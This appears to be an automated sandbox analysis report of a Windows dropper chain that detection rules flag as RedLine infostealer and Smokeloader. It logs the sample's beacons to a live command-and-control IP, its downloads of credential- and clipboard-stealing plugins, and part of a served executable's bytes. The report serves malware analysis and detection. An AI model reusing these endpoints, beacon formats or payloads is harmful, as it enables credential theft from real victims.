                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 19:00:51 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                          Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01367F00 CreateMutexW,GetLastError,SetCurrentDirectoryA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,11_2_01367F00
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 19:00:50 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: xriv.exe, 0000000B.00000002.318710664.000000000165A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          System Summary

                          barindex
                          Source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB3BA20_2_00EB3BA2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB5C9E0_2_00EB5C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00943BA21_2_00943BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00945C9E1_2_00945C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00408C602_2_00408C60
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040DC112_2_0040DC11
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00407C3F2_2_00407C3F
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00418CCC2_2_00418CCC
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00406CA02_2_00406CA0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004028B02_2_004028B0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004182442_2_00418244
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004016502_2_00401650
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00402F202_2_00402F20
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004193C42_2_004193C4
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004187882_2_00418788
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00402F892_2_00402F89
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00402B902_2_00402B90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004073A02_2_004073A0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066786D2_2_0066786D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006618B72_2_006618B7
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006789EF2_2_006789EF
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006631F02_2_006631F0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006631872_2_00663187
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00662B172_2_00662B17
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006784AB2_2_006784AB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00662DF72_2_00662DF7
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066DE782_2_0066DE78
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00668EC72_2_00668EC7
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00667EA62_2_00667EA6
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0067A7252_2_0067A725
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00678F332_2_00678F33
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00666F072_2_00666F07
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006677D92_2_006677D9
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_008570002_2_00857000
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0138853011_2_01388530
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0138754D11_2_0138754D
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01366F4011_2_01366F40
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00EB1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00941F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00941F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01375E20 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01377CE0 appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: String function: 0040E1D8 appears 44 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: String function: 0066E43F appears 44 times
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 380422 bytes, 2 files, at 0x2c +A "bfCg.exe" +A "xriv.exe", ID 1563, number 1, 18 datablocks, 0x1503 compression
                          Source: bfCg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 189540 bytes, 2 files, at 0x2c +A "afCf.exe" +A "nika.exe", ID 1523, number 1, 9 datablocks, 0x1503 compression
